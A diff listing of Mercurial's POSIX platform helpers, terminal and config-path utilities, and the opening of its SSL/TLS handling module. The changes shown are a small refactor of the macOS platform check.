240 240 checklink = os.path.join(cachedir, 'checklink')
241 241 # try fast path, read only
242 242 if os.path.islink(checklink):
243 243 return True
244 244 if os.path.isdir(cachedir):
245 245 checkdir = cachedir
246 246 else:
247 247 checkdir = path
248 248 cachedir = None
249 249 fscheckdir = pycompat.fsdecode(checkdir)
250 250 name = tempfile.mktemp(dir=fscheckdir,
251 251 prefix=r'checklink-')
252 252 name = pycompat.fsencode(name)
253 253 try:
254 254 fd = None
255 255 if cachedir is None:
256 256 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
257 257 prefix=r'hg-checklink-')
258 258 target = pycompat.fsencode(os.path.basename(fd.name))
259 259 else:
260 260 # create a fixed file to link to; doesn't matter if it
261 261 # already exists.
262 262 target = 'checklink-target'
263 263 try:
264 264 open(os.path.join(cachedir, target), 'w').close()
265 265 except IOError as inst:
266 266 if inst[0] == errno.EACCES:
267 267 # If we can't write to cachedir, just pretend
268 268 # that the fs is readonly and by association
269 269 # that the fs won't support symlinks. This
270 270 # seems like the least dangerous way to avoid
271 271 # data loss.
272 272 return False
273 273 raise
274 274 try:
275 275 os.symlink(target, name)
276 276 if cachedir is None:
277 277 unlink(name)
278 278 else:
279 279 try:
280 280 os.rename(name, checklink)
281 281 except OSError:
282 282 unlink(name)
283 283 return True
284 284 except OSError as inst:
285 285 # link creation might race, try again
286 286 if inst[0] == errno.EEXIST:
287 287 continue
288 288 raise
289 289 finally:
290 290 if fd is not None:
291 291 fd.close()
292 292 except AttributeError:
293 293 return False
294 294 except OSError as inst:
295 295 # sshfs might report failure while successfully creating the link
296 296 if inst[0] == errno.EIO and os.path.exists(name):
297 297 unlink(name)
298 298 return False
299 299
300 300 def checkosfilename(path):
301 301 '''Check that the base-relative path is a valid filename on this platform.
302 302 Returns None if the path is ok, or a UI string describing the problem.'''
303 303 return None # on posix platforms, every path is ok
304 304
305 305 def setbinary(fd):
306 306 pass
307 307
308 308 def pconvert(path):
309 309 return path
310 310
311 311 def localpath(path):
312 312 return path
313 313
314 314 def samefile(fpath1, fpath2):
315 315 """Returns whether path1 and path2 refer to the same file. This is only
316 316 guaranteed to work for files, not directories."""
317 317 return os.path.samefile(fpath1, fpath2)
318 318
319 319 def samedevice(fpath1, fpath2):
320 320 """Returns whether fpath1 and fpath2 are on the same device. This is only
321 321 guaranteed to work for files, not directories."""
322 322 st1 = os.lstat(fpath1)
323 323 st2 = os.lstat(fpath2)
324 324 return st1.st_dev == st2.st_dev
325 325
326 326 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
327 327 def normcase(path):
328 328 return path.lower()
329 329
330 330 # what normcase does to ASCII strings
331 331 normcasespec = encoding.normcasespecs.lower
332 332 # fallback normcase function for non-ASCII strings
333 333 normcasefallback = normcase
334 334
335 if pycompat.sysplatform == 'darwin':
335 if pycompat.isdarwin:
336 336
337 337 def normcase(path):
338 338 '''
339 339 Normalize a filename for OS X-compatible comparison:
340 340 - escape-encode invalid characters
341 341 - decompose to NFD
342 342 - lowercase
343 343 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
344 344
345 345 >>> normcase(b'UPPER')
346 346 'upper'
347 347 >>> normcase(b'Caf\\xc3\\xa9')
348 348 'cafe\\xcc\\x81'
349 349 >>> normcase(b'\\xc3\\x89')
350 350 'e\\xcc\\x81'
351 351 >>> normcase(b'\\xb8\\xca\\xc3\\xca\\xbe\\xc8.JPG') # issue3918
352 352 '%b8%ca%c3\\xca\\xbe%c8.jpg'
353 353 '''
354 354
355 355 try:
356 356 return encoding.asciilower(path) # exception for non-ASCII
357 357 except UnicodeDecodeError:
358 358 return normcasefallback(path)
359 359
360 360 normcasespec = encoding.normcasespecs.lower
361 361
362 362 def normcasefallback(path):
363 363 try:
364 364 u = path.decode('utf-8')
365 365 except UnicodeDecodeError:
366 366 # OS X percent-encodes any bytes that aren't valid utf-8
367 367 s = ''
368 368 pos = 0
369 369 l = len(path)
370 370 while pos < l:
371 371 try:
372 372 c = encoding.getutf8char(path, pos)
373 373 pos += len(c)
374 374 except ValueError:
375 375 c = '%%%02X' % ord(path[pos:pos + 1])
376 376 pos += 1
377 377 s += c
378 378
379 379 u = s.decode('utf-8')
380 380
381 381 # Decompose then lowercase (HFS+ technote specifies lower)
382 382 enc = unicodedata.normalize(r'NFD', u).lower().encode('utf-8')
383 383 # drop HFS+ ignored characters
384 384 return encoding.hfsignoreclean(enc)
385 385
386 386 if pycompat.sysplatform == 'cygwin':
387 387 # workaround for cygwin, in which mount point part of path is
388 388 # treated as case sensitive, even though underlying NTFS is case
389 389 # insensitive.
390 390
391 391 # default mount points
392 392 cygwinmountpoints = sorted([
393 393 "/usr/bin",
394 394 "/usr/lib",
395 395 "/cygdrive",
396 396 ], reverse=True)
397 397
398 398 # use upper-ing as normcase as same as NTFS workaround
399 399 def normcase(path):
400 400 pathlen = len(path)
401 401 if (pathlen == 0) or (path[0] != pycompat.ossep):
402 402 # treat as relative
403 403 return encoding.upper(path)
404 404
405 405 # to preserve case of mountpoint part
406 406 for mp in cygwinmountpoints:
407 407 if not path.startswith(mp):
408 408 continue
409 409
410 410 mplen = len(mp)
411 411 if mplen == pathlen: # mount point itself
412 412 return mp
413 413 if path[mplen] == pycompat.ossep:
414 414 return mp + encoding.upper(path[mplen:])
415 415
416 416 return encoding.upper(path)
417 417
418 418 normcasespec = encoding.normcasespecs.other
419 419 normcasefallback = normcase
420 420
421 421 # Cygwin translates native ACLs to POSIX permissions,
422 422 # but these translations are not supported by native
423 423 # tools, so the exec bit tends to be set erroneously.
424 424 # Therefore, disable executable bit access on Cygwin.
425 425 def checkexec(path):
426 426 return False
427 427
428 428 # Similarly, Cygwin's symlink emulation is likely to create
429 429 # problems when Mercurial is used from both Cygwin and native
430 430 # Windows, with other native tools, or on shared volumes
431 431 def checklink(path):
432 432 return False
433 433
434 434 _needsshellquote = None
435 435 def shellquote(s):
436 436 if pycompat.sysplatform == 'OpenVMS':
437 437 return '"%s"' % s
438 438 global _needsshellquote
439 439 if _needsshellquote is None:
440 440 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
441 441 if s and not _needsshellquote(s):
442 442 # "s" shouldn't have to be quoted
443 443 return s
444 444 else:
445 445 return "'%s'" % s.replace("'", "'\\''")
446 446
447 447 def quotecommand(cmd):
448 448 return cmd
449 449
450 450 def popen(command, mode='r'):
451 451 return os.popen(command, mode)
452 452
453 453 def testpid(pid):
454 454 '''return False if pid dead, True if running or not sure'''
455 455 if pycompat.sysplatform == 'OpenVMS':
456 456 return True
457 457 try:
458 458 os.kill(pid, 0)
459 459 return True
460 460 except OSError as inst:
461 461 return inst.errno != errno.ESRCH
462 462
463 463 def explainexit(code):
464 464 """return a 2-tuple (desc, code) describing a subprocess status
465 465 (codes from kill are negative - not os.system/wait encoding)"""
466 466 if code >= 0:
467 467 return _("exited with status %d") % code, code
468 468 return _("killed by signal %d") % -code, -code
469 469
470 470 def isowner(st):
471 471 """Return True if the stat object st is from the current user."""
472 472 return st.st_uid == os.getuid()
473 473
474 474 def findexe(command):
475 475 '''Find executable for command searching like which does.
476 476 If command is a basename then PATH is searched for command.
477 477 PATH isn't searched if command is an absolute or relative path.
478 478 If command isn't found None is returned.'''
479 479 if pycompat.sysplatform == 'OpenVMS':
480 480 return command
481 481
482 482 def findexisting(executable):
483 483 'Will return executable if existing file'
484 484 if os.path.isfile(executable) and os.access(executable, os.X_OK):
485 485 return executable
486 486 return None
487 487
488 488 if pycompat.ossep in command:
489 489 return findexisting(command)
490 490
491 491 if pycompat.sysplatform == 'plan9':
492 492 return findexisting(os.path.join('/bin', command))
493 493
494 494 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
495 495 executable = findexisting(os.path.join(path, command))
496 496 if executable is not None:
497 497 return executable
498 498 return None
499 499
500 500 def setsignalhandler():
501 501 pass
502 502
503 503 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
504 504
505 505 def statfiles(files):
506 506 '''Stat each file in files. Yield each stat, or None if a file does not
507 507 exist or has a type we don't care about.'''
508 508 lstat = os.lstat
509 509 getkind = stat.S_IFMT
510 510 for nf in files:
511 511 try:
512 512 st = lstat(nf)
513 513 if getkind(st.st_mode) not in _wantedkinds:
514 514 st = None
515 515 except OSError as err:
516 516 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
517 517 raise
518 518 st = None
519 519 yield st
520 520
521 521 def getuser():
522 522 '''return name of current user'''
523 523 return pycompat.fsencode(getpass.getuser())
524 524
525 525 def username(uid=None):
526 526 """Return the name of the user with the given uid.
527 527
528 528 If uid is None, return the name of the current user."""
529 529
530 530 if uid is None:
531 531 uid = os.getuid()
532 532 try:
533 533 return pwd.getpwuid(uid)[0]
534 534 except KeyError:
535 535 return str(uid)
536 536
537 537 def groupname(gid=None):
538 538 """Return the name of the group with the given gid.
539 539
540 540 If gid is None, return the name of the current group."""
541 541
542 542 if gid is None:
543 543 gid = os.getgid()
544 544 try:
545 545 return grp.getgrgid(gid)[0]
546 546 except KeyError:
547 547 return str(gid)
548 548
549 549 def groupmembers(name):
550 550 """Return the list of members of the group with the given
551 551 name, KeyError if the group does not exist.
552 552 """
553 553 return list(grp.getgrnam(name).gr_mem)
554 554
555 555 def spawndetached(args):
556 556 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
557 557 args[0], args)
558 558
559 559 def gethgcmd():
560 560 return sys.argv[:1]
561 561
562 562 def makedir(path, notindexed):
563 563 os.mkdir(path)
564 564
565 565 def lookupreg(key, name=None, scope=None):
566 566 return None
567 567
568 568 def hidewindow():
569 569 """Hide current shell window.
570 570
571 571 Used to hide the window opened when starting asynchronous
572 572 child process under Windows, unneeded on other systems.
573 573 """
574 574 pass
575 575
576 576 class cachestat(object):
577 577 def __init__(self, path):
578 578 self.stat = os.stat(path)
579 579
580 580 def cacheable(self):
581 581 return bool(self.stat.st_ino)
582 582
583 583 __hash__ = object.__hash__
584 584
585 585 def __eq__(self, other):
586 586 try:
587 587 # Only dev, ino, size, mtime and atime are likely to change. Out
588 588 # of these, we shouldn't compare atime but should compare the
589 589 # rest. However, one of the other fields changing indicates
590 590 # something fishy going on, so return False if anything but atime
591 591 # changes.
592 592 return (self.stat.st_mode == other.stat.st_mode and
593 593 self.stat.st_ino == other.stat.st_ino and
594 594 self.stat.st_dev == other.stat.st_dev and
595 595 self.stat.st_nlink == other.stat.st_nlink and
596 596 self.stat.st_uid == other.stat.st_uid and
597 597 self.stat.st_gid == other.stat.st_gid and
598 598 self.stat.st_size == other.stat.st_size and
599 599 self.stat.st_mtime == other.stat.st_mtime and
600 600 self.stat.st_ctime == other.stat.st_ctime)
601 601 except AttributeError:
602 602 return False
603 603
604 604 def __ne__(self, other):
605 605 return not self == other
606 606
607 607 def executablepath():
608 608 return None # available on Windows only
609 609
610 610 def statislink(st):
611 611 '''check whether a stat result is a symlink'''
612 612 return st and stat.S_ISLNK(st.st_mode)
613 613
614 614 def statisexec(st):
615 615 '''check whether a stat result is an executable file'''
616 616 return st and (st.st_mode & 0o100 != 0)
617 617
618 618 def poll(fds):
619 619 """block until something happens on any file descriptor
620 620
621 621 This is a generic helper that will check for any activity
622 622 (read, write. exception) and return the list of touched files.
623 623
624 624 In unsupported cases, it will raise a NotImplementedError"""
625 625 try:
626 626 while True:
627 627 try:
628 628 res = select.select(fds, fds, fds)
629 629 break
630 630 except select.error as inst:
631 631 if inst.args[0] == errno.EINTR:
632 632 continue
633 633 raise
634 634 except ValueError: # out of range file descriptor
635 635 raise NotImplementedError()
636 636 return sorted(list(set(sum(res, []))))
637 637
638 638 def readpipe(pipe):
639 639 """Read all available data from a pipe."""
640 640 # We can't fstat() a pipe because Linux will always report 0.
641 641 # So, we set the pipe to non-blocking mode and read everything
642 642 # that's available.
643 643 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
644 644 flags |= os.O_NONBLOCK
645 645 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
646 646
647 647 try:
648 648 chunks = []
649 649 while True:
650 650 try:
651 651 s = pipe.read()
652 652 if not s:
653 653 break
654 654 chunks.append(s)
655 655 except IOError:
656 656 break
657 657
658 658 return ''.join(chunks)
659 659 finally:
660 660 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
661 661
662 662 def bindunixsocket(sock, path):
663 663 """Bind the UNIX domain socket to the specified path"""
664 664 # use relative path instead of full path at bind() if possible, since
665 665 # AF_UNIX path has very small length limit (107 chars) on common
666 666 # platforms (see sys/un.h)
667 667 dirname, basename = os.path.split(path)
668 668 bakwdfd = None
669 669 if dirname:
670 670 bakwdfd = os.open('.', os.O_DIRECTORY)
671 671 os.chdir(dirname)
672 672 sock.bind(basename)
673 673 if bakwdfd:
674 674 os.fchdir(bakwdfd)
675 675 os.close(bakwdfd)
@@ -1,85 +1,85 b''
1 1 from __future__ import absolute_import
2 2
3 3 import array
4 4 import errno
5 5 import fcntl
6 6 import os
7 7 import sys
8 8
9 9 from . import (
10 10 encoding,
11 11 pycompat,
12 12 util,
13 13 )
14 14
15 15 # BSD 'more' escapes ANSI color sequences by default. This can be disabled by
16 16 # $MORE variable, but there's no compatible option with Linux 'more'. Given
17 17 # OS X is widely used and most modern Unix systems would have 'less', setting
18 18 # 'less' as the default seems reasonable.
19 19 fallbackpager = 'less'
20 20
21 21 def _rcfiles(path):
22 22 rcs = [os.path.join(path, 'hgrc')]
23 23 rcdir = os.path.join(path, 'hgrc.d')
24 24 try:
25 25 rcs.extend([os.path.join(rcdir, f)
26 26 for f, kind in util.listdir(rcdir)
27 27 if f.endswith(".rc")])
28 28 except OSError:
29 29 pass
30 30 return rcs
31 31
32 32 def systemrcpath():
33 33 path = []
34 34 if pycompat.sysplatform == 'plan9':
35 35 root = 'lib/mercurial'
36 36 else:
37 37 root = 'etc/mercurial'
38 38 # old mod_python does not set sys.argv
39 39 if len(getattr(sys, 'argv', [])) > 0:
40 40 p = os.path.dirname(os.path.dirname(pycompat.sysargv[0]))
41 41 if p != '/':
42 42 path.extend(_rcfiles(os.path.join(p, root)))
43 43 path.extend(_rcfiles('/' + root))
44 44 return path
45 45
46 46 def userrcpath():
47 47 if pycompat.sysplatform == 'plan9':
48 48 return [encoding.environ['home'] + '/lib/hgrc']
49 elif pycompat.sysplatform == 'darwin':
49 elif pycompat.isdarwin:
50 50 return [os.path.expanduser('~/.hgrc')]
51 51 else:
52 52 confighome = encoding.environ.get('XDG_CONFIG_HOME')
53 53 if confighome is None or not os.path.isabs(confighome):
54 54 confighome = os.path.expanduser('~/.config')
55 55
56 56 return [os.path.expanduser('~/.hgrc'),
57 57 os.path.join(confighome, 'hg', 'hgrc')]
58 58
59 59 def termsize(ui):
60 60 try:
61 61 import termios
62 62 TIOCGWINSZ = termios.TIOCGWINSZ # unavailable on IRIX (issue3449)
63 63 except (AttributeError, ImportError):
64 64 return 80, 24
65 65
66 66 for dev in (ui.ferr, ui.fout, ui.fin):
67 67 try:
68 68 try:
69 69 fd = dev.fileno()
70 70 except AttributeError:
71 71 continue
72 72 if not os.isatty(fd):
73 73 continue
74 74 arri = fcntl.ioctl(fd, TIOCGWINSZ, '\0' * 8)
75 75 height, width = array.array(r'h', arri)[:2]
76 76 if width > 0 and height > 0:
77 77 return width, height
78 78 except ValueError:
79 79 pass
80 80 except IOError as e:
81 81 if e[0] == errno.EINVAL:
82 82 pass
83 83 else:
84 84 raise
85 85 return 80, 24
@@ -1,865 +1,865 b''
1 1 # sslutil.py - SSL handling for mercurial
2 2 #
3 3 # Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
4 4 # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 from __future__ import absolute_import
11 11
12 12 import hashlib
13 13 import os
14 14 import re
15 15 import ssl
16 16
17 17 from .i18n import _
18 18 from . import (
19 19 error,
20 20 pycompat,
21 21 util,
22 22 )
23 23
24 24 # Python 2.7.9+ overhauled the built-in SSL/TLS features of Python. It added
25 25 # support for TLS 1.1, TLS 1.2, SNI, system CA stores, etc. These features are
26 26 # all exposed via the "ssl" module.
27 27 #
28 28 # Depending on the version of Python being used, SSL/TLS support is either
29 29 # modern/secure or legacy/insecure. Many operations in this module have
30 30 # separate code paths depending on support in Python.
31 31
32 32 configprotocols = {
33 33 'tls1.0',
34 34 'tls1.1',
35 35 'tls1.2',
36 36 }
37 37
38 38 hassni = getattr(ssl, 'HAS_SNI', False)
39 39
40 40 # TLS 1.1 and 1.2 may not be supported if the OpenSSL Python is compiled
41 41 # against doesn't support them.
42 42 supportedprotocols = {'tls1.0'}
43 43 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_1'):
44 44 supportedprotocols.add('tls1.1')
45 45 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_2'):
46 46 supportedprotocols.add('tls1.2')
47 47
48 48 try:
49 49 # ssl.SSLContext was added in 2.7.9 and presence indicates modern
50 50 # SSL/TLS features are available.
51 51 SSLContext = ssl.SSLContext
52 52 modernssl = True
53 53 _canloaddefaultcerts = util.safehasattr(SSLContext, 'load_default_certs')
54 54 except AttributeError:
55 55 modernssl = False
56 56 _canloaddefaultcerts = False
57 57
58 58 # We implement SSLContext using the interface from the standard library.
59 59 class SSLContext(object):
60 60 def __init__(self, protocol):
61 61 # From the public interface of SSLContext
62 62 self.protocol = protocol
63 63 self.check_hostname = False
64 64 self.options = 0
65 65 self.verify_mode = ssl.CERT_NONE
66 66
67 67 # Used by our implementation.
68 68 self._certfile = None
69 69 self._keyfile = None
70 70 self._certpassword = None
71 71 self._cacerts = None
72 72 self._ciphers = None
73 73
74 74 def load_cert_chain(self, certfile, keyfile=None, password=None):
75 75 self._certfile = certfile
76 76 self._keyfile = keyfile
77 77 self._certpassword = password
78 78
79 79 def load_default_certs(self, purpose=None):
80 80 pass
81 81
82 82 def load_verify_locations(self, cafile=None, capath=None, cadata=None):
83 83 if capath:
84 84 raise error.Abort(_('capath not supported'))
85 85 if cadata:
86 86 raise error.Abort(_('cadata not supported'))
87 87
88 88 self._cacerts = cafile
89 89
90 90 def set_ciphers(self, ciphers):
91 91 self._ciphers = ciphers
92 92
93 93 def wrap_socket(self, socket, server_hostname=None, server_side=False):
94 94 # server_hostname is unique to SSLContext.wrap_socket and is used
95 95 # for SNI in that context. So there's nothing for us to do with it
96 96 # in this legacy code since we don't support SNI.
97 97
98 98 args = {
99 99 'keyfile': self._keyfile,
100 100 'certfile': self._certfile,
101 101 'server_side': server_side,
102 102 'cert_reqs': self.verify_mode,
103 103 'ssl_version': self.protocol,
104 104 'ca_certs': self._cacerts,
105 105 'ciphers': self._ciphers,
106 106 }
107 107
108 108 return ssl.wrap_socket(socket, **args)
109 109
110 110 def _hostsettings(ui, hostname):
111 111 """Obtain security settings for a hostname.
112 112
113 113 Returns a dict of settings relevant to that hostname.
114 114 """
115 115 s = {
116 116 # Whether we should attempt to load default/available CA certs
117 117 # if an explicit ``cafile`` is not defined.
118 118 'allowloaddefaultcerts': True,
119 119 # List of 2-tuple of (hash algorithm, hash).
120 120 'certfingerprints': [],
121 121 # Path to file containing concatenated CA certs. Used by
122 122 # SSLContext.load_verify_locations().
123 123 'cafile': None,
124 124 # Whether certificate verification should be disabled.
125 125 'disablecertverification': False,
126 126 # Whether the legacy [hostfingerprints] section has data for this host.
127 127 'legacyfingerprint': False,
128 128 # PROTOCOL_* constant to use for SSLContext.__init__.
129 129 'protocol': None,
130 130 # String representation of minimum protocol to be used for UI
131 131 # presentation.
132 132 'protocolui': None,
133 133 # ssl.CERT_* constant used by SSLContext.verify_mode.
134 134 'verifymode': None,
135 135 # Defines extra ssl.OP* bitwise options to set.
136 136 'ctxoptions': None,
137 137 # OpenSSL Cipher List to use (instead of default).
138 138 'ciphers': None,
139 139 }
140 140
141 141 # Allow minimum TLS protocol to be specified in the config.
142 142 def validateprotocol(protocol, key):
143 143 if protocol not in configprotocols:
144 144 raise error.Abort(
145 145 _('unsupported protocol from hostsecurity.%s: %s') %
146 146 (key, protocol),
147 147 hint=_('valid protocols: %s') %
148 148 ' '.join(sorted(configprotocols)))
149 149
150 150 # We default to TLS 1.1+ where we can because TLS 1.0 has known
151 151 # vulnerabilities (like BEAST and POODLE). We allow users to downgrade to
152 152 # TLS 1.0+ via config options in case a legacy server is encountered.
153 153 if 'tls1.1' in supportedprotocols:
154 154 defaultprotocol = 'tls1.1'
155 155 else:
156 156 # Let people know they are borderline secure.
157 157 # We don't document this config option because we want people to see
158 158 # the bold warnings on the web site.
159 159 # internal config: hostsecurity.disabletls10warning
160 160 if not ui.configbool('hostsecurity', 'disabletls10warning'):
161 161 ui.warn(_('warning: connecting to %s using legacy security '
162 162 'technology (TLS 1.0); see '
163 163 'https://mercurial-scm.org/wiki/SecureConnections for '
164 164 'more info\n') % hostname)
165 165 defaultprotocol = 'tls1.0'
166 166
167 167 key = 'minimumprotocol'
168 168 protocol = ui.config('hostsecurity', key, defaultprotocol)
169 169 validateprotocol(protocol, key)
170 170
171 171 key = '%s:minimumprotocol' % hostname
172 172 protocol = ui.config('hostsecurity', key, protocol)
173 173 validateprotocol(protocol, key)
174 174
175 175 # If --insecure is used, we allow the use of TLS 1.0 despite config options.
176 176 # We always print a "connection security to %s is disabled..." message when
177 177 # --insecure is used. So no need to print anything more here.
178 178 if ui.insecureconnections:
179 179 protocol = 'tls1.0'
180 180
181 181 s['protocol'], s['ctxoptions'], s['protocolui'] = protocolsettings(protocol)
182 182
183 183 ciphers = ui.config('hostsecurity', 'ciphers')
184 184 ciphers = ui.config('hostsecurity', '%s:ciphers' % hostname, ciphers)
185 185 s['ciphers'] = ciphers
186 186
187 187 # Look for fingerprints in [hostsecurity] section. Value is a list
188 188 # of <alg>:<fingerprint> strings.
189 189 fingerprints = ui.configlist('hostsecurity', '%s:fingerprints' % hostname,
190 190 [])
191 191 for fingerprint in fingerprints:
192 192 if not (fingerprint.startswith(('sha1:', 'sha256:', 'sha512:'))):
193 193 raise error.Abort(_('invalid fingerprint for %s: %s') % (
194 194 hostname, fingerprint),
195 195 hint=_('must begin with "sha1:", "sha256:", '
196 196 'or "sha512:"'))
197 197
198 198 alg, fingerprint = fingerprint.split(':', 1)
199 199 fingerprint = fingerprint.replace(':', '').lower()
200 200 s['certfingerprints'].append((alg, fingerprint))
201 201
202 202 # Fingerprints from [hostfingerprints] are always SHA-1.
203 203 for fingerprint in ui.configlist('hostfingerprints', hostname, []):
204 204 fingerprint = fingerprint.replace(':', '').lower()
205 205 s['certfingerprints'].append(('sha1', fingerprint))
206 206 s['legacyfingerprint'] = True
207 207
208 208 # If a host cert fingerprint is defined, it is the only thing that
209 209 # matters. No need to validate CA certs.
210 210 if s['certfingerprints']:
211 211 s['verifymode'] = ssl.CERT_NONE
212 212 s['allowloaddefaultcerts'] = False
213 213
214 214 # If --insecure is used, don't take CAs into consideration.
215 215 elif ui.insecureconnections:
216 216 s['disablecertverification'] = True
217 217 s['verifymode'] = ssl.CERT_NONE
218 218 s['allowloaddefaultcerts'] = False
219 219
220 220 if ui.configbool('devel', 'disableloaddefaultcerts'):
221 221 s['allowloaddefaultcerts'] = False
222 222
223 223 # If both fingerprints and a per-host ca file are specified, issue a warning
224 224 # because users should not be surprised about what security is or isn't
225 225 # being performed.
226 226 cafile = ui.config('hostsecurity', '%s:verifycertsfile' % hostname)
227 227 if s['certfingerprints'] and cafile:
228 228 ui.warn(_('(hostsecurity.%s:verifycertsfile ignored when host '
229 229 'fingerprints defined; using host fingerprints for '
230 230 'verification)\n') % hostname)
231 231
232 232 # Try to hook up CA certificate validation unless something above
233 233 # makes it not necessary.
234 234 if s['verifymode'] is None:
235 235 # Look at per-host ca file first.
236 236 if cafile:
237 237 cafile = util.expandpath(cafile)
238 238 if not os.path.exists(cafile):
239 239 raise error.Abort(_('path specified by %s does not exist: %s') %
240 240 ('hostsecurity.%s:verifycertsfile' % hostname,
241 241 cafile))
242 242 s['cafile'] = cafile
243 243 else:
244 244 # Find global certificates file in config.
245 245 cafile = ui.config('web', 'cacerts')
246 246
247 247 if cafile:
248 248 cafile = util.expandpath(cafile)
249 249 if not os.path.exists(cafile):
250 250 raise error.Abort(_('could not find web.cacerts: %s') %
251 251 cafile)
252 252 elif s['allowloaddefaultcerts']:
253 253 # CAs not defined in config. Try to find system bundles.
254 254 cafile = _defaultcacerts(ui)
255 255 if cafile:
256 256 ui.debug('using %s for CA file\n' % cafile)
257 257
258 258 s['cafile'] = cafile
259 259
260 260 # Require certificate validation if CA certs are being loaded and
261 261 # verification hasn't been disabled above.
262 262 if cafile or (_canloaddefaultcerts and s['allowloaddefaultcerts']):
263 263 s['verifymode'] = ssl.CERT_REQUIRED
264 264 else:
265 265 # At this point we don't have a fingerprint, aren't being
266 266 # explicitly insecure, and can't load CA certs. Connecting
267 267 # is insecure. We allow the connection and abort during
268 268 # validation (once we have the fingerprint to print to the
269 269 # user).
270 270 s['verifymode'] = ssl.CERT_NONE
271 271
272 272 assert s['protocol'] is not None
273 273 assert s['ctxoptions'] is not None
274 274 assert s['verifymode'] is not None
275 275
276 276 return s
277 277
278 278 def protocolsettings(protocol):
279 279 """Resolve the protocol for a config value.
280 280
281 281 Returns a 3-tuple of (protocol, options, ui value) where the first
282 282 2 items are values used by SSLContext and the last is a string value
283 283 of the ``minimumprotocol`` config option equivalent.
284 284 """
285 285 if protocol not in configprotocols:
286 286 raise ValueError('protocol value not supported: %s' % protocol)
287 287
288 288 # Despite its name, PROTOCOL_SSLv23 selects the highest protocol
289 289 # that both ends support, including TLS protocols. On legacy stacks,
290 290 # the highest it likely goes is TLS 1.0. On modern stacks, it can
291 291 # support TLS 1.2.
292 292 #
293 293 # The PROTOCOL_TLSv* constants select a specific TLS version
294 294 # only (as opposed to multiple versions). So the method for
295 295 # supporting multiple TLS versions is to use PROTOCOL_SSLv23 and
296 296 # disable protocols via SSLContext.options and OP_NO_* constants.
297 297 # However, SSLContext.options doesn't work unless we have the
298 298 # full/real SSLContext available to us.
299 299 if supportedprotocols == {'tls1.0'}:
300 300 if protocol != 'tls1.0':
301 301 raise error.Abort(_('current Python does not support protocol '
302 302 'setting %s') % protocol,
303 303 hint=_('upgrade Python or disable setting since '
304 304 'only TLS 1.0 is supported'))
305 305
306 306 return ssl.PROTOCOL_TLSv1, 0, 'tls1.0'
307 307
308 308 # WARNING: returned options don't work unless the modern ssl module
309 309 # is available. Be careful when adding options here.
310 310
311 311 # SSLv2 and SSLv3 are broken. We ban them outright.
312 312 options = ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3
313 313
314 314 if protocol == 'tls1.0':
315 315 # Defaults above are to use TLS 1.0+
316 316 pass
317 317 elif protocol == 'tls1.1':
318 318 options |= ssl.OP_NO_TLSv1
319 319 elif protocol == 'tls1.2':
320 320 options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
321 321 else:
322 322 raise error.Abort(_('this should not happen'))
323 323
324 324 # Prevent CRIME.
325 325 # There is no guarantee this attribute is defined on the module.
326 326 options |= getattr(ssl, 'OP_NO_COMPRESSION', 0)
327 327
328 328 return ssl.PROTOCOL_SSLv23, options, protocol
329 329
330 330 def wrapsocket(sock, keyfile, certfile, ui, serverhostname=None):
331 331 """Add SSL/TLS to a socket.
332 332
333 333 This is a glorified wrapper for ``ssl.wrap_socket()``. It makes sane
334 334 choices based on what security options are available.
335 335
336 336 In addition to the arguments supported by ``ssl.wrap_socket``, we allow
337 337 the following additional arguments:
338 338
339 339 * serverhostname - The expected hostname of the remote server. If the
340 340 server (and client) support SNI, this tells the server which certificate
341 341 to use.
342 342 """
343 343 if not serverhostname:
344 344 raise error.Abort(_('serverhostname argument is required'))
345 345
346 346 for f in (keyfile, certfile):
347 347 if f and not os.path.exists(f):
348 348 raise error.Abort(_('certificate file (%s) does not exist; '
349 349 'cannot connect to %s') % (f, serverhostname),
350 350 hint=_('restore missing file or fix references '
351 351 'in Mercurial config'))
352 352
353 353 settings = _hostsettings(ui, serverhostname)
354 354
355 355 # We can't use ssl.create_default_context() because it calls
356 356 # load_default_certs() unless CA arguments are passed to it. We want to
357 357 # have explicit control over CA loading because implicitly loading
358 358 # CAs may undermine the user's intent. For example, a user may define a CA
359 359 # bundle with a specific CA cert removed. If the system/default CA bundle
360 360 # is loaded and contains that removed CA, you've just undone the user's
361 361 # choice.
362 362 sslcontext = SSLContext(settings['protocol'])
363 363
364 364 # This is a no-op unless using modern ssl.
365 365 sslcontext.options |= settings['ctxoptions']
366 366
367 367 # This still works on our fake SSLContext.
368 368 sslcontext.verify_mode = settings['verifymode']
369 369
370 370 if settings['ciphers']:
371 371 try:
372 372 sslcontext.set_ciphers(settings['ciphers'])
373 373 except ssl.SSLError as e:
374 374 raise error.Abort(_('could not set ciphers: %s') % e.args[0],
375 375 hint=_('change cipher string (%s) in config') %
376 376 settings['ciphers'])
377 377
378 378 if certfile is not None:
379 379 def password():
380 380 f = keyfile or certfile
381 381 return ui.getpass(_('passphrase for %s: ') % f, '')
382 382 sslcontext.load_cert_chain(certfile, keyfile, password)
383 383
384 384 if settings['cafile'] is not None:
385 385 try:
386 386 sslcontext.load_verify_locations(cafile=settings['cafile'])
387 387 except ssl.SSLError as e:
388 388 if len(e.args) == 1: # pypy has different SSLError args
389 389 msg = e.args[0]
390 390 else:
391 391 msg = e.args[1]
392 392 raise error.Abort(_('error loading CA file %s: %s') % (
393 393 settings['cafile'], msg),
394 394 hint=_('file is empty or malformed?'))
395 395 caloaded = True
396 396 elif settings['allowloaddefaultcerts']:
